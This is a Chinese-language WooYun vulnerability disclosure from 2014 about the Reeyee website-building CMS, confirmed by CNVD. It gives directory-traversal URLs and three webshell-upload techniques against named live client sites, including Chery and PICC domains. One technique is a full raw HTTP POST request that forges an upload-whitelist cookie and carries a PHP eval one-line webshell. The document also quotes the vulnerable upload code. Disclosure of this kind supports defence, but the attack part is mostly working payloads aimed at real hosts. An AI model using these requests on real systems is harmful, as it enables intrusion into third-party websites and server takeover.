当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2014-059045
漏洞标题:
锐意先行网站建设系统遍历文件漏洞+三招Getshell+波及奇瑞、人保等大量高端客户
相关厂商:
锐意先行
漏洞作者:
夕风号
提交时间:
2014-05-01 10:21
修复时间:
2014-07-30 10:22
公开时间:
2014-07-30 10:22
漏洞类型:
文件上传导致任意代码执行
危害等级:
自评Rank:
10
漏洞状态:
已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2014-05-01: 细节已通知厂商并且等待厂商处理中
2014-05-06: 厂商已经确认,细节仅向厂商公开
2014-05-09: 细节向第三方安全合作伙伴开放
2014-06-30: 细节向核心白帽子及相关领域专家公开
2014-07-10: 细节向普通白帽子公开
2014-07-20: 细节向实习白帽子公开
2014-07-30: 细节向公众公开

简要描述:

Fyi:
1.http://www.reeyee.cn/case/
2.http://www.reeyee.net/brand.html

详细说明:

1.案例
[官方]
http://www.reeyee.com
http://www.reeyee.cn
http://www.reeyee.net
[客户]
http://www.cheryacteco.com
http://www.cheryplus.com
http://www.picc-js.com
http://www.bqls.net
http://www.tx-hoto.com
其它客户可搜索“Powered by reeyee”或于http://www.reeyee.cn/case/中查看。
2.文件遍历
访问/admin/inc/dialogbox.php?pDir=&curr_dir=&type=0&filetypes=&form=frmList&formname=brief_img即可,将pDir改为形如../../格式可实现目录回溯,比如,
http://www.cheryplus.com/admin/inc/dialogbox.php?pDir=&curr_dir=../../../&type=0&filetypes=&form=frmList&formname=brief_img
有时可泄露敏感文件。
3.Getshell
0x01
当服务器为IIS 6.0时,访问/admin/inc/wnews.php?type=1&path=video&form=frmList&formname=img,上传*.php;.jpg格式webshell即可,比如,
http://202.119.148.83/admin/inc/wnews.php?type=1&path=video&form=frmList&formname=img
然后后于页面源代码中查看webshell路径。
0x02
当服务器为IIS 6.0或IIS 7.5时,访问/admin/inc/wnews.php?type=1&path=video.php&form=frmList&formname=img,有时需绕过客户端Javascript验证(略),上传*.jpg格式webshell即可,比如,
http://www.wiiboox.cn/admin/inc/wnews.php?type=1&path=video.php&form=frmList&formname=img
然后后于页面源代码中查看webshell路径。

a.png


0x03
终极解法
以http://www.tx-hoto.com为例,向目标/admin/inc/wnewssave.php发起如下HTTP请求,注意Cookie值及filename值:
POST http://www.tx-hoto.com/admin/inc/wnewssave.php?formname=src&form=frmList

Host: www.tx-hoto.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.tx-hoto.com/admin/inc/wnews.php?type=1&path=user_download&form=frmList&formname=src
Cookie: user_download_src_UPLOAD=php%2Cxls%2Cppt%2Cpdf%2Cdoc%2Cdocx%7C20000000%7C0%7C1%7C1
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------29809125845679
Content-Length: 636
-----------------------------29809125845679\r\n
Content-Disposition: form-data; name="filepath"\r\n
\r\n
user_download\r\n
-----------------------------29809125845679\r\n
Content-Disposition: form-data; name="type"\r\n
\r\n
1\r\n
-----------------------------29809125845679\r\n
Content-Disposition: form-data; name="src"; filename="test.php"\r\n
Content-Type: application/msword\r\n
\r\n
<?php @eval($_POST['savep']);?>\r\n
-----------------------------29809125845679\r\n
Content-Disposition: form-data; name="Submit"\r\n
\r\n
· æ\x8f\x90交 ·\r\n
-----------------------------29809125845679\r\n
Content-Disposition: form-data; name="proimg"\r\n
\r\n
\r\n
-----------------------------29809125845679--\r\n


b.png

漏洞证明:

来,看代码!
/admin/inc/wnewssave.php

$para	= array("TYPE"		=> "gif,jpg,jpeg",
					"SIZE"		=> $upload_max_filesize,
					"EXISTS"	=> 0,
					"RENAME"	=> 0,
					"ERROR"		=>1,
					"RESIZE"	=>"");
	if (isset($_COOKIE["{$_POST['filepath']}_{$_GET['formname']}_UPLOAD"])) 
	{
		$coo = $_COOKIE["{$_POST['filepath']}_{$_GET['formname']}_UPLOAD"];
		$tmp	= explode("|",$coo);
		$para['TYPE'] = $tmp[0];
    	$para['SIZE'] = $tmp[1];
    	$para['EXISTS'] = $tmp[2];
    	$para['RENAME'] = $tmp[3];
    	$para['ERROR'] = $tmp[4];
    	if(isset($tmp[5])) $para['RESIZE'] = $tmp[4];
	}
	elseif (isset($_COOKIE["{$_POST['filepath']}_UPLOAD"])) 
	{
		$coo = $_COOKIE["{$_POST['filepath']}_UPLOAD"];
		$tmp	= explode("|",$coo);
		$para['TYPE'] = $tmp[0];
    	$para['SIZE'] = $tmp[1];
    	$para['EXISTS'] = $tmp[2];
    	$para['RENAME'] = $tmp[3];
    	$para['ERROR'] = $tmp[4];
    	if(isset($tmp[5])) $para['RESIZE'] = $tmp[4];
	}
	$u->UPLOAD_FILE_TYPE 				= $para['TYPE'];
	$u->UPLOAD_FILE_MAX_SIZE 			= $para['SIZE']>$upload_max_filesize?$upload_max_filesize:$para['SIZE'];
	$u->UPLOAD_FILE_CHECK_FILE_EXISTS	= $para['EXISTS'];
	$u->UPLOAD_FILE_AUTO_RENAME			= $para['RENAME'];
	$u->UPLOAD_FILE_ERROR_TYPE			= $para['ERROR'];

修复方案:

You know it.

版权声明:转载请注明来源 夕风号@乌云

>

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:19

确认时间:2014-05-06 08:45

厂商回复:

CNVD确认并在实例上复现所述多个漏洞情况,对于涉及的重要信息系统部门案例,已经转由CNCERT下发给江苏分中心协调处置。CNVD并将通过公开联系渠道联系软件生产厂商处置。

最新状态:

暂无